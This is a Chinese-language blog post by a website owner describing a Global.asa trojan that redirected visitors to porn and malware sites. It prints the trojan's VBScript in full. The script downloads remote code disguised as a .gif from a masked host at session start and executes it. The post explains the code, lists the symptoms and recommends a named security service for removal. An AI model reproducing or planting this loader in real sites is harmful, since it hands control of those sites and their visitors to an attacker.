最近在查看網站流量統計的時候發現流量有些異常,於是檢查網站程序的時候發現程序多出了一個文件。文件名是Global.asa,上傳時間為9月13日晚上,我的網站使用的是開源的企業建站系統,一開始沒注意過這個問題,就在昨天我的網站流量一下子跌倒了低谷,當時我就懷疑是網站程序出現了問題,但是就是找不出毛病來。後來經常訪問網站的客戶打電話告訴我說:“從百度打開你的網站會自動跳轉到某些色情網站上,並且會被360提示有木馬病毒。”於是在網上搜索了一些解決Global.asa木馬的方法,下面就給大家說下我的解決方法。
什麼是global.asa木馬呢?
global.asa在百度百科裡是這樣介紹的:
Global.asa 文件是一個可選的文件,它可包含可被 ASP 應用程序中每個頁面訪問的對象、變量以及方法的聲明。所有合法的瀏覽器腳本都能在 Global.asa 中使用。 Global.asa 中,我們可以告知 application 和 session 對像在啟動和結束時做什麼事情。完成此項任務的代碼被放置在事件操作器中。
根據上面的介紹大家應該大體瞭解了,其實這個木馬就是屬於網站程序木馬,也稱:腳本木馬. 但是駭客為什麼會以global.asa命名呢?因為這個文件可以調用很多程序,比如當客戶訪問你的網站的時候,可以調用跳轉的命令。正因為global.asa文件作用的特殊性,所以被駭客所利用,並製作成了網站木馬。
首先我們來看下global.asa木馬的代碼:
sub Session_OnStart
On Error Resume Next
url="http://www.********.info:1680/global/xmlfilecode.gif"
Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")
ObjXMLHTTP.Open "GET",url,False
ObjXMLHTTP.setRequestHeader "User-Agent",url
ObjXMLHTTP.send
GetHtml=ObjXMLHTTP.responseBody
Set ObjXMLHTTP=Nothing
set objStream = Server.CreateObject("Adodb.Stream")
objStream.Type = 1
objStream.Mode =3
objStream.Open
objStream.Write GetHtml
objStream.Position = 0
objStream.Type = 2
objStream.Charset = "gb2312"
GetHtml = objStream.ReadText
objStream.Close
set objStream=Nothing
if instr(GetHtml,"by*aming")>0 then
execute GetHtml
end if
end sub
sub Session_OnEnd
end sub
</script>
我來給大家先解釋一下這個代碼的作用:因為global.asa 文件是網站啟動的文件,當一個網站被用戶訪問的時候,會執行Application_Start代碼段的內容,當一個當一個用戶第一次訪問時會執行Session_Start代碼段的內容,所以此段代碼的作用就是當訪問的時候自動下載獲取木馬內容,上面遇到的就是跳轉性作用的木馬代碼。
global.asa掛馬的症狀
global.asa文件是隱藏性的你在FTP都看不到的,用了esafe.tw網站木馬檢測工具檢測到了了隱藏global.asa的木馬,當用戶從百度點擊進來的時候,網站的會自動跳轉到其他網站:比如色情站點和有病毒的網站。再就是百度site:自己的網站會發現收錄了許多色情頁面如下圖所示:
如果站長們發現自己的站點也有上述的症狀,那恭喜你了。
global.asa這個文件一般是在根目錄下的,我自己嘗試了N多遍,都沒有刪掉,在文件屬性方面也做了修改,也始終無法刪除這個頑固的木馬。到最後找了eSafe白帽資安網,他們用CHMOD命令刪除了木馬。如果自己不會刪除的話你可以找自己的空間商讓他們給你刪除這個木馬。
global.asa屬於系統文件只能在cmd命令下強制刪除。
到最後還要告訴大家一點的是,為什麼網站會被掛global.asa木馬呢?其實根本的原因就是網站程序有漏洞,因為網站有漏洞才會被駭客利用並提權拿下了你網站的權限並上傳製作了木馬。只有把網站的安全做好了,你才不會被掛馬的。在這裡大家一定不要小看了網站的安全,往下安全尤其重要,牽扯著我們站長的心,網站不安全,百度就會拔毛,自己辛辛苦苦的網站就這麼被毀,你也不甘心,只有網站安全了,才能帶來穩定的客戶來源,安全問題不可忽視。給用戶一個安全穩定的網站平台,當然給你帶來的則是最大的營銷收益。
